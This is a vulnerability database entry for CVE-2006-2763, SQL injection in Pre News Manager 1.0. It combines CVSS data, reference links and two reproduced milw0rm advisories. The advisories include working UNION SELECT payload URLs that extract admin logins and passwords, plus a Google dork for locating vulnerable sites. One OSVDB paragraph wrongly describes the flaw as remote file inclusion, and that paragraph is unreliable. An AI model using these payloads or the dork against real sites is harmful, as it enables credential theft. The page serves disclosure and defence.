CVE-2006-2763
CVSS 6.4
Published: 2006-06-01 21:02:00
Last revised: 2011-03-07 21:36:58

[Original] SQL injection vulnerability in Pre News Manager 1.0 allows remote attackers to execute arbitrary SQL commands via the (1) id parameter to (a) index.php, and the (2) nid parameter to (b) news_detail.php, (c) email_story.php, (d) thankyou.php, (e) printable_view.php, (f) tella_friend.php, and (g) send_comments.php. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information. It is possible that this is primary to CVE-2006-2678.


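[CNNVD] Pre News Manager multiple SQL injection vulnerabilities (CNNVD-200606-019)

Pre News Manager 1.0 contains multiple SQL injection vulnerabilities. Remote attackers can execute arbitrary SQL commands via (1) the id parameter to (a) index.php, and (2) the nid parameter to (b) news_detail.php, (c) email_story.php, (d) thankyou.php, (e) printable_view.php, (f) tella_friend.php and (g) send_comments.php.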

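- CVSS (base score)

CVSS score: 6.4 [MEDIUM]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: NONE [no impact on system availability]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

Product and version information (CPE) is not yet available

- OVAL (technical details for detection)

No related OVAL definition found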

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2763
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2763
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200606-019
(Official data source) CNNVD

- Other links and resources

http://www.vupen.com/english/advisories/2006/1990
(UNKNOWN)  VUPEN  ADV-2006-1990
http://www.securityfocus.com/archive/1/archive/1/497219/100/0/threaded
(UNKNOWN)  BUGTRAQ  20081009 Re: News Manager Remote SQL Injection Vulnerability
http://www.securityfocus.com/archive/1/archive/1/497185/100/0/threaded
(UNKNOWN)  BUGTRAQ  20081009 News Manager Remote SQL Injection Vulnerability
http://secunia.com/advisories/20284
(VENDOR_ADVISORY)  SECUNIA  20284
http://xforce.iss.net/xforce/xfdb/43070
(UNKNOWN)  XF  prenewsmanager-index-sql-injection(43070)
http://xforce.iss.net/xforce/xfdb/34035
(UNKNOWN)  XF  prenewsmanager-newsdetail-sql-injection(34035)
http://www.securityfocus.com/archive/1/archive/1/493369/100/0/threaded
(UNKNOWN)  BUGTRAQ  20080615 [ECHO_ADV_97$2008] Pre News Manager <= 1.0 (index.php id) Sql Injection Vulnerability
http://www.osvdb.org/26079
(UNKNOWN)  OSVDB  26079
http://www.osvdb.org/26078
(UNKNOWN)  OSVDB  26078
http://www.osvdb.org/26077
(UNKNOWN)  OSVDB  26077
http://www.osvdb.org/26076
(UNKNOWN)  OSVDB  26076
http://www.osvdb.org/26075
(UNKNOWN)  OSVDB  26075
http://www.osvdb.org/26074
(UNKNOWN)  OSVDB  26074
http://www.osvdb.org/26073
(UNKNOWN)  OSVDB  26073
http://www.milw0rm.com/exploits/5803
(UNKNOWN)  MILW0RM  5803

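- Vulnerability information

Pre News Manager multiple SQL injection vulnerabilities
Medium severity SQL injection
2006-06-01 00:00:00 2006-06-01 00:00:00
Remote
Pre News Manager 1.0 contains multiple SQL injection vulnerabilities. Remote attackers can execute arbitrary SQL commands via (1) the id parameter to (a) index.php, and (2) the nid parameter to (b) news_detail.php, (c) email_story.php, (d) thankyou.php, (e) printable_view.php, (f) tella_friend.php and (g) send_comments.php.

- Advisories and patches

- Vulnerability information (3841)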

Pre News Manager 1.0 Remote SQL Injection Vulnerability (EDBID:3841)
php webapps
2007-05-03 Verified
0 Mehmet Ince
N/A [Click to download]
==============================================

Pre News Manager v1.0 Remote SQL Injection

==============================================

Found: Cyber-Security.org

==============================================

Script site: http://www.preproject.com/news.asp

==============================================

Exploit:
news_detail.php?nid=-1/**/union/**/select/**/0,1,2,password,4,5,6/**/from/**/admin/*

==============================================

Example: http://www.preproject.com/news%20manager/

==============================================

# milw0rm.com [2007-05-03]
		

- Vulnerability information (5803)

Pre News Manager <= 1.0 (index.php id) SQL Injection Vulnerability (EDBID:5803)
php webapps
2008-06-13 Verified
0 K-159
N/A [Click to download]
____________________   ___ ___ ________
\_   _____/\_   ___ \ /   |   \\_____  \  
 |    __)_ /    \  \//    ~    \/   |   \ 
 |        \\     \___\    Y    /    |    \
/_______  / \______  /\___|_  /\_______  /
        \/         \/       \/         \/ 

                                        .OR.ID
ECHO_ADV_97$2008

-----------------------------------------------------------------------------------------
[ECHO_ADV_97$2008] Pre News Manager <= 1.0 (index.php id) Sql Injection Vulnerability
-----------------------------------------------------------------------------------------

Author         : M.Hasran Addahroni
Date           : June, 13 th 2008
Location       : Jakarta, Indonesia
Web            : http://e-rdc.org/v1/news.php?readmore=97
Critical Lvl   : Medium
Impact	       : System access
Where	       : From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application   : Pre News Manager
version       : <= 1.0
Vendor        : http://www.preproject.com/news.asp
Description   :

Pre News Manager is online news publishing system. Very easy to manage and integration. Powerful online news management system with user friendly control panel. Include news box to any where in your website and integrate news manager in only one step. Upload latest news with images and advertisements. Include  HEADLINES page  to any where in your website and news will automatically updated to that page. Subscribe for latest and breaking news. Submit articles, news latest stories and many more. Add your own news categories. Also can be use for private news website. 
---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~

Input passed to the "id" parameter in index.php page is not properly verified before being used to sql query. 
This can be exploited thru the browser and get password from admin in plain text.
Successful exploitation requires that "magic_quotes" is off.


Poc/Exploit:
~~~~~~~~~

http://www.target.com/[path]/index.php?id=-1%20union%20select%201,2,3,concat(login,0x3a,password),5,6,7%20from%20admin--


Dork:
~~~~
Google    : "To enjoy our newletter please register with us !"


Solution:
~~~~~~

- Edit the source code to ensure that input is properly verified.
- Turn on magic_quotes in php.ini
 

Timeline:
~~~~~~~~

- 10 - 06 - 2008 bug found
- 13 - 06 - 2008 vendor contacted
- 13 - 06 - 2008 advisory released
---------------------------------------------------------------------------

Shoutz:
~~~~
~ ping - my dearest wife, zautha my little warrior "happy birthday, dear"
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,pushm0v,az01,negative,the_hydra,neng chika, str0ke
~ everybody [at] SCAN-NUSANTARA and SCAN-ASSOSIATES
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,sakitjiwa,x16,an0maly,cybertank,super_temon,b120t0,inggar,fachri,adi,rahmat,indra,cyb3rh3b
~ dr188le,SinChan,h4ntu,cow_1seng,poniman_coy,paman_gembul,ketut,rizal,cR4SH3R,kuntua,stev_manado,nofry,k1tk4t,0pt1c
~ newbie_hacker@yahoogroups.com
~ #aikmel #e-c-h-o @irc.dal.net

---------------------------------------------------------------------------
Contact:
~~~~~

     K-159 || echo|staff || eufrato[at]gmail[dot]com
     Homepage: http://www.e-rdc.org/

-------------------------------- [ EOF ] ----------------------------------

# milw0rm.com [2008-06-13]
		

- Vulnerability information

26073
Pre News Manager index.php id Parameter SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public Third-party Verified

- Vulnerability description

Pre News Manager contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to index.php not properly sanitizing user input supplied to the 'id' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

- Timeline

2006-05-24 Unknown
Unknown Unknown

- Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- Related references

- Vulnerability author

 

 
